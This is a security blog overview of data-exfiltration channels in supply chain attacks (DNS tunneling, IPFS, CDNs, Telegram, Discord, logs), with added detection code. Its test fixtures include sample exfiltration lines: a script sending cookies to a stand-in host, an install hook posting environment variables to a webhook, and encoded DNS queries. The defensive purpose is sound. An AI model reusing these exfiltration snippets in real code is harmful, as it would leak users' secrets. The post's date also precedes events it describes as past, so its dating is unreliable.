Exfiltration Techniques in Supply Chain Attacks: An Overview
A technical analysis of stealthy exfiltration techniques used in modern supply chain attacks.

June 10, 2024
Modern threat actors are leveraging sophisticated covert techniques to exfiltrate sensitive data from development environments in supply chain attacks. By exploiting trusted platforms like Discord, Telegram, and CDNs as command-and-control (C2) channels, attackers can operate under the radar. Techniques like DNS tunneling and CDN abuse enable attackers to communicate unnoticed, making it essential for security teams to adopt targeted defense measures. This guide explores stealthy exfiltration methods, real-world case studies, and actionable technical controls to counter these advanced threats.
1. DNS Tunneling
DNS tunneling encodes data within DNS queries and responses, using DNS (instead of plain HTTP) as the network channel. This allows attackers to communicate stealthily with command-and-control (C2) servers. Because DNS is a fundamental protocol that traditional security measures often overlook, it provides an attractive vector for covert data exfiltration.
Real-World Examples:
Alex Birsan's dependency confusion PoC (2021): Alex Birsan's famous dependency confusion proof of concept targeted major companies like Apple and Microsoft. By exploiting confusion between public and private npm package names, Birsan exfiltrated sensitive data through DNS queries to attacker-controlled domains, bypassing traditional firewall blacklists. This attack demonstrated how easily DNS tunneling could be used to steal corporate secrets without raising alarms.
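A detection heuristic for the DNS beaconing described above, added here as an example (it is not code from the original post or from Birsan's PoC): it scores each query's subdomain labels for length and Shannon entropy and flags apex domains that receive repeated encoded-looking queries. The log format, the thresholds and the hex-encoded sample lines are constructed assumptions.

```python
import math
from collections import defaultdict

# Constructed resolver log, "<time> <client> <qtype> <qname>" (not from the post).
# The TXT lookups carry hex-encoded host data in the leftmost label, the shape a
# dependency-confusion PoC uses to beacon hostname, path and env out over DNS.
SAMPLE_DNS_LOG = """\
12:00:01 10.0.0.5 A registry.npmjs.org
12:00:02 10.0.0.5 A api.github.com
12:00:03 10.0.0.5 TXT 4a6f686e2d446f652d4d6163426f6f6b2d50726f.c0ffee.exfil-example.invalid
12:00:04 10.0.0.5 TXT 2f686f6d652f6a646f652f70726f6a6563742d78.c0ffee.exfil-example.invalid
12:00:05 10.0.0.5 TXT 4157535f5345435245543d4558414d504c454b4559.c0ffee.exfil-example.invalid
12:00:06 10.0.0.5 A fonts.googleapis.com
"""

MAX_LABEL_LEN = 30   # ordinary hostnames rarely have one label this long
MIN_ENTROPY = 3.5    # bits per char: encoded blobs score high, words score low
MIN_HITS = 2         # alert on repeated odd queries to one apex, not one outlier

def shannon_entropy(s: str) -> float:
    """Bits per character of s (0.0 for empty input)."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def split_name(qname: str):
    """Return (subdomain labels, apex). Apex is the last two labels here; a real
    deployment would use the Public Suffix List (co.uk etc.)."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])

def is_suspicious_query(qname: str) -> bool:
    """Long or high-entropy subdomain labels are the tunneling signature."""
    sub, _ = split_name(qname)
    longest = max((len(label) for label in sub), default=0)
    return longest > MAX_LABEL_LEN or shannon_entropy("".join(sub)) > MIN_ENTROPY

def flag_tunneling(log_text: str) -> dict:
    """Map apex domain -> count of suspicious queries, keeping apexes at MIN_HITS+."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        qname = parts[3]
        if is_suspicious_query(qname):
            hits[split_name(qname)[1]] += 1
    return {apex: n for apex, n in hits.items() if n >= MIN_HITS}
```

Run against real resolver or Zeek DNS logs, the same per-apex aggregation also surfaces the high query volume that a tunnel needs to move any meaningful amount of data.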
2. IPFS (Inter-Planetary File System)
IPFS is a decentralized protocol designed for content storage and sharing across multiple nodes. Its resilience and decentralized nature, while advantageous for legitimate uses, are also exploited by attackers to distribute and conceal stolen data, making it challenging for victims to track and remove such data.
Attackers use IPFS to generate unique content identifiers (CIDs) that point to the distributed data. This data, split across multiple IPFS nodes, is accessible through any IPFS gateway using these CIDs, complicating takedown efforts and allowing widespread dissemination with minimal control by the original owners.
Real-World Examples:
Ledger ConnectKit wallet drain (2023): On December 14th, 2023, Ledger—one of the most popular hardware wallets for cryptocurrency—detected an exploit involving the Ledger Connect Kit npm package. The attackers hijacked the upstream dependency through a credential leak in GitHub Actions from a maintainer, which provided publishing rights. They subsequently injected malicious code into decentralized applications (DApps) that were using the Ledger Connect Kit, tricking EVM (Ethereum Virtual Machine) DApp users into signing fraudulent transactions that drained their wallets.
3. CDN Exploitation
Content Delivery Networks (CDNs) are critical to modern web infrastructure, enabling faster and more reliable content distribution. However, their trusted status presents a significant security risk, particularly in the context of supply chain attacks. Attackers have increasingly exploited this trust by injecting malicious scripts into libraries delivered through CDNs, compromising millions of websites without raising suspicion.
Real-World Example:
Polyfill hack (2024): To illustrate CDN exploitation in supply chain attacks, the recent Polyfill.io incident serves as a prime example. In July 2024, attackers compromised the Polyfill CDN, which is widely used by websites to ensure compatibility of newer web features across older browsers. The attackers injected malicious code into the CDN-delivered JavaScript files, impacting thousands of websites that relied on these scripts for polyfill functionality.
Cloudflare cdnjs exploit (2021): What's alarming is that even organizations serving global internet infrastructure have been impacted by these attacks. A vulnerability found in Cloudflare's cdnjs service in 2021 further highlighted these risks: the security researcher RyotaK was able to execute arbitrary commands on Cloudflare's core cdnjs library, potentially compromising over 12% of the web.
Ledger ConnectKit wallet drain (2023): Another instance of CDN exploitation was the Ledger attack detailed above, where attackers leveraged Fastly's CDN to dynamically load malicious scripts during the package installation process. By using a trusted CDN, the attackers infiltrated environments undetected.
Source: listen.dev research
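One control that directly addresses the CDN cases above is Subresource Integrity: the page pins the hash of the script it reviewed, and the browser refuses a file whose bytes no longer match, which is exactly what a swapped CDN-delivered file looks like. The following is an added example, not code from the post or from any project named on it; the script bodies and URLs are constructed.

```python
import base64
import hashlib
import hmac

# Constructed script bodies (not polyfill.io's real code): the file a site pinned,
# and the same URL after a hostile change to what the CDN delivers.
ORIGINAL_JS = b"window.polyfill = function () { return 'ok'; };\n"
TAMPERED_JS = ORIGINAL_JS + b"fetch('https://collector.invalid/?c=' + document.cookie);\n"

ALGOS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}

def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Integrity metadata in the form the browser expects: '<algo>-<base64 digest>'."""
    digest = ALGOS[algo](body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"

def script_tag(src: str, body: bytes) -> str:
    """Emit the <script> tag to ship once a CDN-hosted file has been reviewed."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')

def verify_sri(body: bytes, integrity: str) -> bool:
    """Mirror the browser's check: among the tokens using the strongest listed
    algorithm, at least one digest must match the delivered bytes."""
    parsed = []
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in ALGOS:
            parsed.append((STRENGTH[algo], algo, token))
    if not parsed:
        # Browser behaviour: metadata with no recognised algorithm disables the
        # check entirely, so a typo such as "sha-384" silently removes protection.
        return True
    strongest = max(s for s, _, _ in parsed)
    return any(hmac.compare_digest(sri_hash(body, algo), token)
               for s, algo, token in parsed if s == strongest)
```

SRI only helps when the pinned URL serves fixed content; a "latest" endpoint that legitimately changes will break the page, which is the trade-off that left many sites loading polyfill scripts unpinned.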
5. Telegram
Overview: Telegram’s API is robust and widely used for various legitimate purposes. However, it also provides attackers with a convenient and encrypted channel for exfiltrating stolen data. By using Telegram bots, attackers can seamlessly integrate exfiltration capabilities into their malware.
Real-World Examples:
Masad Stealer attack (2020): The Masad Stealer malware is a prime example of attackers exploiting Telegram for exfiltration. After infecting a system, Masad Stealer collects sensitive data, such as browser credentials, cryptocurrency wallets, and Discord tokens, and sends this information to a Telegram bot. Using Telegram’s encrypted API, the malware bypasses traditional security measures, making it difficult to detect the data exfiltration.
6. Discord
Discord is extensively used by developers and gaming communities and provides rich integration through APIs and webhooks. Unfortunately, attackers exploit these features for exfiltration, as evidenced by recent supply chain malware in npm packages that siphons data via Discord webhooks, hiding in plain sight amid regular Discord traffic while providing a channel for C2 and exfiltration. This goes back to 2020, when researchers reported tracing this method of attack to APT groups.
Real-World Examples:
Malicious npm packages using Discord C2 (2024): On August 23, 2024, researchers discovered several malicious npm packages using Discord webhooks to exfiltrate sensitive data. These packages, live on npm for months, siphoned data such as environment variables and API keys by leveraging Discord as a command-and-control (C2) channel. The attackers embedded malicious scripts into these npm packages, which executed during the installation process, disguising the exfiltration by blending into regular Discord traffic.
These packages were distributed widely and remained undetected for up to three months, infiltrating numerous projects. Once installed, the malware disguised itself by executing during the package installation process through a malicious installation script.
Malware families using Discord for exfiltration (2021): Known malware families like Smokeloader and PrivateLoader also exploited Discord's infrastructure to deliver payloads and exfiltrate data. These loaders, often used by known APT groups, utilized Discord's CDN and webhooks to communicate with infected systems, leveraging the platform's trustworthiness to evade detection. This technique was discussed by threat researcher Crawl3r as far back as 2020.
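The Telegram and Discord cases share one pattern: code that runs from an npm lifecycle hook and pushes the environment to a bot or webhook endpoint. This added example (not code from the post or from any of the packages it mentions) audits a package for exactly that, by checking each install hook and the local files it invokes for the two endpoint URL shapes and for environment reads. The package, its `setup.js` and the webhook ID and token are constructed placeholders.

```python
import json
import re

# Constructed package (not a real npm package): a postinstall hook runs a local
# script that posts the process environment to a chat-platform webhook URL.
PACKAGE_JSON = json.dumps({
    "name": "example-utils",
    "version": "1.0.3",
    "scripts": {"postinstall": "node setup.js", "test": "jest"},
})
PACKAGE_FILES = {
    "setup.js": (
        "const https = require('https');\n"
        "const body = JSON.stringify({content: JSON.stringify(process.env)});\n"
        "https.request('https://discord.com/api/webhooks/000000000000000000/EXAMPLE-TOKEN',"
        " {method: 'POST'}).end(body);\n"
    ),
}

# Hooks npm runs automatically on install, i.e. before anyone reads the code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# URL shapes of the two channels the post describes (IDs and tokens are placeholders).
EXFIL_ENDPOINTS = {
    "discord_webhook": re.compile(
        r"https?://(?:[\w.-]*\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"),
    "telegram_bot_api": re.compile(r"https?://api\.telegram\.org/bot\d+:[\w-]+/\w+"),
}
ENV_READ = re.compile(r"process\.env|os\.environ|\$\{?[A-Z_]{4,}\}?")

def audit_package(package_json: str, files: dict) -> list:
    """Return (hook, file, kind, match) findings for every lifecycle hook."""
    findings = []
    scripts = json.loads(package_json).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        # Scan the hook command itself plus any package file it invokes.
        sources = {"package.json": cmd}
        sources.update({tok: files[tok] for tok in cmd.split() if tok in files})
        for name, text in sources.items():
            for kind, pattern in EXFIL_ENDPOINTS.items():
                findings += [(hook, name, kind, m.group(0)) for m in pattern.finditer(text)]
            env = ENV_READ.search(text)
            if env:
                findings.append((hook, name, "reads_environment", env.group(0)))
    return findings
```

In CI, `npm ci --ignore-scripts` stops these hooks from running at all; an audit like this is for deciding which packages genuinely need them.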
7. Logs
Overview: Logging services like Sentry are integral to debugging and monitoring applications, as are the CI build logs from platforms like GitHub Actions that developers and organizations use every day. However, when misconfigured, these services can inadvertently log and expose sensitive information, creating an unintentional exfiltration vector for attackers.
Real-World Example:
Solana wallet drain (2022): An interesting example of the dangers posed by misconfigured logging services is the 2022 Solana wallet drain incident, in which Phantom, Trust and Slope wallet users suffered the theft of $5M USD in crypto funds. Attackers were able to exploit a misconfigured Sentry logging service to capture sensitive information, including seed phrases that had been logged in a past release. These keys were then used to gain unauthorized access to users' wallets, leading to the theft of significant amounts of cryptocurrency.
PyPI admin token leak (2024): Earlier this year, a critical GitHub Personal Access Token (PAT) tied to a PyPI administrator was accidentally leaked within a public Docker container, potentially exposing the entire Python ecosystem to an upstream supply chain attack. As detailed in an investigation by the PyPI team, which was able to contain the incident in time, the token, which granted admin-level access to the core repositories of PyPI and the Python Software Foundation (PSF), was found in a compiled Python file that had not been cleaned up properly.
Had this token fallen into the wrong hands, attackers could have injected malicious code into any PyPI package or even altered the Python language itself. Fortunately, the token was discovered by researchers from JFrog and revoked within 17 minutes, preventing any known exploitation.
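Both logging incidents come down to secrets reaching a log sink that was never meant to hold them. The following is an added example, not code from the post, from Sentry, or from the projects named: a scrubber in the shape of a Sentry `before_send` hook that redacts GitHub token shapes and mnemonic-looking word runs from every string in an event before it leaves the process. The event is constructed, and the mnemonic check is a shape heuristic rather than a wordlist lookup.

```python
import re
from typing import Any

# Constructed event in the shape a Sentry SDK hands to before_send (not a real capture).
SAMPLE_EVENT = {
    "message": "wallet init failed for mnemonic: abandon ability able about above absent "
               "absorb abstract absurd abuse access accident",
    "extra": {"git_token": "ghp_EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLE0", "build": 42},
    "breadcrumbs": [{"message": "fetch https://api.example/repo"}],
}

# Token shapes: classic GitHub tokens (gh?_ prefix + 36 chars) and fine-grained PATs
# (github_pat_ + 82 chars). Add the prefixes of whatever else your stack issues.
GITHUB_TOKEN = re.compile(r"\b(?:gh[pousr]_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{82})\b")
# A BIP39 mnemonic is 12 to 24 lowercase dictionary words. This only matches the
# shape; a production filter would check each word against the BIP39 wordlist.
MNEMONIC = re.compile(r"\b(?:[a-z]{3,8} ){11,23}[a-z]{3,8}\b")

def scrub_text(s: str) -> str:
    """Redact every recognised secret shape in one string."""
    s = GITHUB_TOKEN.sub("[REDACTED_GITHUB_TOKEN]", s)
    return MNEMONIC.sub("[REDACTED_MNEMONIC]", s)

def scrub(value: Any) -> Any:
    """Recursively scrub every string inside a nested dict/list event; non-string
    leaves (build numbers, timestamps) pass through untouched."""
    if isinstance(value, str):
        return scrub_text(value)
    if isinstance(value, dict):
        return {k: scrub(v) for k, v in value.items()}
    if isinstance(value, list):
        return [scrub(v) for v in value]
    return value

def before_send(event: dict, hint: dict) -> dict:
    """Drop-in for sentry_sdk.init(before_send=before_send): the event that reaches
    the logging service is the scrubbed copy, the original is not modified."""
    return scrub(event)
```

The same `scrub_text` can run over CI output before it is uploaded, since the GitHub Actions secret masking only covers values registered as secrets, not tokens that arrive through a file or a build artifact.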
So how can I defend against these exploits?
Preventing stealthy data exfiltration requires a comprehensive approach that integrates preventative, detective, and investigative controls. Given the advanced techniques used in emerging threats and their reliance on trusted channels, it's a problem that is difficult for security and development teams to solve. For more on how to detect and prevent such attacks, stay tuned for a future continuation of this post!